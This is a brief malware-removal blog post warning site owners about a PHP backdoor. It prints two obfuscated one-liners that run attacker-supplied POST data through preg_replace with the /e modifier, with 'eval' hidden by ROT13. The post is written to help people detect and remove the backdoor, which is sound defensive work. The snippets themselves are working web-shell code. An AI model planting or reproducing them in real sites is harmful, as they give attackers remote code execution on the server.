Execute a PHP code through POST veriable with preg_replace /e modifier

By RobertVirus Removal

This code receives php code from $_POST[‘fcty3’] OR $_POST[‘mung3’] variables, and execute on server with preg_replace.
So if you find this in your site, remove it immediately!

<?php ($www= $_POST['fcty3']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>

Another type:

<?php ($www= $_POST['mung3']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.